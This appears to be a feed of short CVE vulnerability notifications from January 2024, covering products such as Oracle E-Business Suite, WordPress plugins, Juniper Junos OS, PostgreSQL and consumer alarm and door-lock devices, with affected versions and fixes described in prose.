🚨 CVE-2024-20938Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: ECC). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-01-20 18:37:25 |
🚨 CVE-2024-20930Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Content Access SDK, Image Export SDK, PDF Export SDK, HTML Export SDK). The supported version that is affected is 8.5.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Outside In Technology accessible data as well as unauthorized read access to a subset of Oracle Outside In Technology accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Outside In Technology. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).🎖@cveNotify |
|
| 2024-01-20 18:37:24 |
🚨 CVE-2024-20928Vulnerability in the Oracle WebCenter Content product of Oracle Fusion Middleware (component: Content Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-01-20 10:37:24 |
🚨 CVE-2023-46749Apache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).🎖@cveNotify |
|
| 2024-01-20 09:37:24 |
🚨 CVE-2023-7063The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-20 06:37:25 |
🚨 CVE-2024-0679The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.🎖@cveNotify |
|
| 2024-01-20 06:37:24 |
🚨 CVE-2024-0623The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-20 05:37:24 |
🚨 CVE-2023-46447The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.🎖@cveNotify |
|
| 2024-01-20 04:37:24 |
🚨 CVE-2023-39326A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.🎖@cveNotify |
|
| 2024-01-20 03:07:32 |
🚨 CVE-2023-51734This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Identity parameter under Remote endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-20 03:07:26 |
🚨 CVE-2023-51733This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Identity parameter under Local endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-20 03:07:25 |
🚨 CVE-2023-51730This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the DDNS Password parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-20 03:07:24 |
🚨 CVE-2023-51729This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the DDNS Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-20 02:37:25 |
🚨 CVE-2023-51906An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component.🎖@cveNotify |
|
| 2024-01-20 02:37:24 |
🚨 CVE-2023-47024Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component.🎖@cveNotify |
|
| 2024-01-20 01:37:26 |
🚨 CVE-2023-51928An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2024-01-20 01:37:25 |
🚨 CVE-2021-31314File upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server.🎖@cveNotify |
|
| 2024-01-19 23:37:24 |
🚨 CVE-2024-23332The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry.🎖@cveNotify |
|
| 2024-01-19 23:07:25 |
🚨 CVE-2024-21596A Heap-based Buffer Overflow vulnerability in the Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network based attacker to cause a Denial of Service (DoS).If an attacker sends a specific BGP UPDATE message to the device, this will cause a memory overwrite and therefore an RPD crash and restart in the backup Routing Engine (RE). Continued receipt of these packets will cause a sustained Denial of Service (DoS) condition in the backup RE.The primary RE is not impacted by this issue and there is no impact on traffic.This issue only affects devices with NSR enabled.This issue requires an attacker to have an established BGP session to a system affected by the issue. This issue affects both eBGP and iBGP implementations.This issue affects:Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.1 versions earlier than 23.1R2; * 23.2 versions earlier than 23.2R1-S2, 23.2R2.Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S4-EVO; * 22.2-EVO versions earlier than 22.2R3-S2-EVO; * 22.3-EVO versions later than 22.3R1-EVO; * 22.4-EVO versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.1-EVO versions earlier than 23.1R2-EVO; * 23.2-EVO versions earlier than 23.2R1-S2-EVO, 23.2R2-EVO.🎖@cveNotify |
|
| 2024-01-19 23:07:24 |
🚨 CVE-2024-21643IdentityModel Extensions for .NET provide assemblies for web developers that wish to use federated identity providers for establishing the caller's identity. Anyone leveraging the `SignedHttpRequest`protocol or the `SignedHttpRequestValidator`is vulnerable. Microsoft.IdentityModel trusts the `jku`claim by default for the `SignedHttpRequest`protocol. This raises the possibility to make any remote or local `HTTP GET` request. The vulnerability has been fixed in Microsoft.IdentityModel.Protocols.SignedHttpRequest. Users should update all their Microsoft.IdentityModel versions to 7.1.2 (for 7x) or higher, 6.34.0 (for 6x) or higher.🎖@cveNotify |
|
| 2024-01-19 22:37:30 |
🚨 CVE-2024-23688Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed.🎖@cveNotify |
|
| 2024-01-19 22:37:25 |
🚨 CVE-2024-0739A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-19 22:37:24 |
🚨 CVE-2024-0737A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.🎖@cveNotify |
|
| 2024-01-19 21:37:32 |
🚨 CVE-2024-0734A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-19 21:37:25 |
🚨 CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.🎖@cveNotify |
|
| 2024-01-19 21:37:24 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2024-01-19 21:07:25 |
🚨 CVE-2024-21599A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS).If an MX Series device receives PTP packets on an MPC3E that doesn't support PTP this causes a memory leak which will result in unpredictable behavior and ultimately in an MPC crash and restart.To monitor for this issue, please use the following FPC vty level commands:show heapshows an increase in "LAN buffer" utilization andshow clksync ptp nbr-upd-infoshows non-zero "Pending PFEs" counter.This issue affects Juniper Networks Junos OS on MX Series with MPC3E: * All versions earlier than 20.4R3-S3; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3; * 21.3 versions earlier than 21.3R2-S1, 21.3R3; * 21.4 versions earlier than 21.4R2; * 22.1 versions earlier than 22.1R2.🎖@cveNotify |
|
| 2024-01-19 21:07:24 |
🚨 CVE-2024-21597An Exposure of Resource to Wrong Sphere vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the intended access restrictions.In an Abstracted Fabric (AF) scenario if routing-instances (RI) are configured, specific valid traffic destined to the device can bypass the configured lo0 firewall filters as it's received in the wrong RI context.This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2.🎖@cveNotify |
|
| 2024-01-19 20:07:32 |
🚨 CVE-2024-0251The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed.🎖@cveNotify |
|
| 2024-01-19 20:07:25 |
🚨 CVE-2023-29446An improper input validation vulnerability has been discovered that could allow an adversary to inject a UNC path via a malicious project file. This allows an adversary to capture NLTMv2 hashes and potentially crack them offline.🎖@cveNotify |
|
| 2024-01-19 20:07:24 |
🚨 CVE-2023-29445An uncontrolled search path element vulnerability (DLL hijacking) has been discovered that could allow a locally authenticated adversary to escalate privileges to SYSTEM.🎖@cveNotify |
|
| 2024-01-19 19:07:38 |
🚨 CVE-2023-52108Vulnerability of process priorities being raised in the ActivityManagerService module. Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-01-19 19:07:31 |
🚨 CVE-2024-0497A vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-19 19:07:30 |
🚨 CVE-2023-51949Verydows v2.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /protected/controller/backend/role_controller🎖@cveNotify |
|
| 2024-01-19 19:07:26 |
🚨 CVE-2024-0252ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component. Authentication is required in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-19 19:07:25 |
🚨 CVE-2023-49295quic-go is an implementation of the QUIC protocol (RFC 9000, RFC 9001, RFC 9002) in Go. An attacker can cause its peer to run out of memory sending a large number of PATH_CHALLENGE frames. The receiver is supposed to respond to each PATH_CHALLENGE frame with a PATH_RESPONSE frame. The attacker can prevent the receiver from sending out (the vast majority of) these PATH_RESPONSE frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate. This vulnerability has been patched in versions 0.37.7, 0.38.2 and 0.39.4.🎖@cveNotify |
|
| 2024-01-19 18:37:32 |
🚨 CVE-2023-6066The WP Custom Widget area WordPress plugin through 1.2.5 does not properly apply capability and nonce checks on any of its AJAX action callback functions, which could allow attackers with subscriber+ privilege to create, delete or modify menus on the site.🎖@cveNotify |
|
| 2024-01-19 18:37:25 |
🚨 CVE-2024-0476A vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-19 18:37:24 |
🚨 CVE-2024-0230A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.🎖@cveNotify |
|
| 2024-01-19 18:07:32 |
🚨 CVE-2024-21585An Improper Handling of Exceptional Conditions vulnerability in BGP session processing of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker, using specific timing outside the attacker's control, to flap BGP sessions and cause the routing protocol daemon (rpd) process to crash and restart, leading to a Denial of Service (DoS) condition. Continued BGP session flapping will create a sustained Denial of Service (DoS) condition.This issue only affects routers configured with non-stop routing (NSR) enabled. Graceful Restart (GR) helper mode, enabled by default, is also required for this issue to be exploitable.Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability.When the BGP session flaps on the NSR-enabled router, the device enters GR-helper/LLGR-helper mode due to the peer having negotiated GR/LLGR-restarter capability and the backup BGP requests for replication of the GR/LLGR-helper session, master BGP schedules, and initiates replication of GR/LLGR stale routes to the backup BGP. In this state, if the BGP session with the BGP peer comes up again, unsolicited replication is initiated for the peer without cleaning up the ongoing GR/LLGR-helper mode replication. This parallel two instances of replication for the same peer leads to the assert if the BGP session flaps again.This issue affects:Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-S1-EVO; * 22.4 versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.2 versions earlier than 23.2R1-S1-EVO, 23.2R2-EVO.🎖@cveNotify |
|
| 2024-01-19 18:07:26 |
🚨 CVE-2023-31488Hyland Perceptive Filters releases before 2023-12-08 (e.g., 11.4.0.2647), as used in Cisco IronPort Email Security Appliance Software, Cisco Secure Email Gateway, and various non-Cisco products, allow attackers to trigger a segmentation fault and execute arbitrary code via a crafted document.🎖@cveNotify |
|
| 2024-01-19 18:07:25 |
🚨 CVE-2020-10757A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-19 18:07:24 |
🚨 CVE-2014-4943The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket.🎖@cveNotify |
|
| 2024-01-19 17:37:25 |
🚨 CVE-2024-21736SAP S/4HANA Finance for (Advanced Payment Management) - versions SAPSCORE 128, S4CORE 107, does not perform necessary authorization checks. A function import could be triggered allowing the attacker to create in-house bank accounts leading to low impact on the confidentiality of the application.🎖@cveNotify |
|
| 2024-01-19 17:37:24 |
🚨 CVE-2022-2585It was discovered that when exec'ing from a non-leader thread, armed POSIX CPU timers would be left on a list but freed, leading to a use-after-free.🎖@cveNotify |
|
| 2024-01-19 17:07:24 |
🚨 CVE-2024-0529A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-19 16:37:44 |
🚨 CVE-2023-46219When saving HSTS data to an excessively long file name, curl could end upremoving all contents, making subsequent requests using that file unaware ofthe HSTS status they should otherwise use.🎖@cveNotify |
|
| 2024-01-19 16:37:43 |
🚨 CVE-2023-5869A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.🎖@cveNotify |
|
| 2024-01-19 16:37:42 |
🚨 CVE-2023-5868A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.🎖@cveNotify |
|
| 2024-01-19 16:37:38 |
🚨 CVE-2023-49286Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to an Incorrect Check of Function Return Value bug Squid is vulnerable to a Denial of Service attack against its Helper process management. This bug is fixed by Squid version 6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-19 16:37:37 |
🚨 CVE-2023-40687IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted RUNSTATS command on an 8TB table. IBM X-Force ID: 264809.🎖@cveNotify |
|
| 2024-01-19 16:37:36 |
🚨 CVE-2023-38727IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted SQL statement. IBM X-Force ID: 262257.🎖@cveNotify |
|
| 2024-01-19 16:37:32 |
🚨 CVE-2023-38003IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow a user with DATAACCESS privileges to execute routines that they should not have access to. IBM X-Force ID: 260214.🎖@cveNotify |
|
| 2024-01-19 16:37:31 |
🚨 CVE-2023-6277An out-of-memory flaw was found in libtiff. Passing a crafted tiff file to TIFFOpen() API may allow a remote attacker to cause a denial of service via a craft input with size smaller than 379 KB.🎖@cveNotify |
|
| 2024-01-19 16:37:30 |
🚨 CVE-2023-5528A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they are using an in-tree storage plugin for Windows nodes.🎖@cveNotify |
|
| 2024-01-19 16:37:26 |
🚨 CVE-2023-21255In multiple functions of binder.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-01-19 16:37:25 |
🚨 CVE-2022-42889Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.🎖@cveNotify |
|
| 2024-01-19 16:07:41 |
🚨 CVE-2023-43985SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component.🎖@cveNotify |
|
| 2024-01-19 16:07:40 |
🚨 CVE-2024-0705The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-01-19 16:07:39 |
🚨 CVE-2024-23659SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.🎖@cveNotify |
|
| 2024-01-19 16:07:36 |
🚨 CVE-2024-23387FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.🎖@cveNotify |
|
| 2024-01-19 16:07:35 |
🚨 CVE-2023-50963IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.🎖@cveNotify |
|
| 2024-01-19 16:07:34 |
🚨 CVE-2023-32337IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288.🎖@cveNotify |
|
| 2024-01-19 16:07:31 |
🚨 CVE-2023-42135PAX A920Pro/A50 devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow local code execution via parameter injection by bypassing the input validation when flashing a specific partition. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-19 16:07:30 |
🚨 CVE-2023-51065Incorrect access control in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to obtain system backups and other sensitive information from the QStar Server.🎖@cveNotify |
|
| 2024-01-19 16:07:29 |
🚨 CVE-2023-51062An unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command.🎖@cveNotify |
|
| 2024-01-19 15:37:33 |
🚨 CVE-2023-50128The remote keyless system of the Hozard alarm system (alarmsystemen) v1.0 sends an identical radio frequency signal for each request, which results in an attacker being able to conduct replay attacks to bring the alarm system to a disarmed state.🎖@cveNotify |
|
| 2024-01-19 15:37:26 |
🚨 CVE-2023-50125A default engineer password set on the Hozard alarm system (Alarmsysteem) v1.0 allows an attacker to bring the alarm system to a disarmed state.🎖@cveNotify |
|
| 2024-01-19 15:37:25 |
🚨 CVE-2007-4465Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.🎖@cveNotify |
|
| 2024-01-19 15:07:32 |
🚨 CVE-2024-22627Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_distributor.php?id=.🎖@cveNotify |
|
| 2024-01-19 15:07:26 |
🚨 CVE-2024-22626Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_retailer.php?id=.🎖@cveNotify |
|
| 2024-01-19 15:07:25 |
🚨 CVE-2023-7083The Voting Record WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-01-19 15:07:24 |
🚨 CVE-2023-50124Flient Smart Door Lock v1.0 is vulnerable to Use of Default Credentials. Due to default credentials on a debug interface, in combination with certain design choices, an attacker can unlock the Flient Smart Door Lock by replacing the fingerprint that is stored on the scanner.🎖@cveNotify |
|
| 2024-01-19 14:37:33 |
🚨 CVE-2024-0475A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580.🎖@cveNotify |
|
| 2024-01-19 14:37:26 |
🚨 CVE-2024-0474A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579.🎖@cveNotify |
|
| 2024-01-19 14:37:25 |
🚨 CVE-2023-50129Missing encryption in the NFC tags of the Flient Smart Door Lock v1.0 allows attackers to create a cloned tag via brief physical proximity to the original tags, which results in an attacker gaining access to the perimeter.🎖@cveNotify |
|
| 2024-01-19 14:37:24 |
🚨 CVE-2023-50126Missing encryption in the RFID tags of the Hozard alarm system (Alarmsysteem) v1.0 allow attackers to create a cloned tag via brief physical proximity to one of the original tags, which results in an attacker being able to bring the alarm system to a disarmed state.🎖@cveNotify |
|
| 2024-01-19 13:37:26 |
🚨 CVE-2024-22402Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-19 13:37:25 |
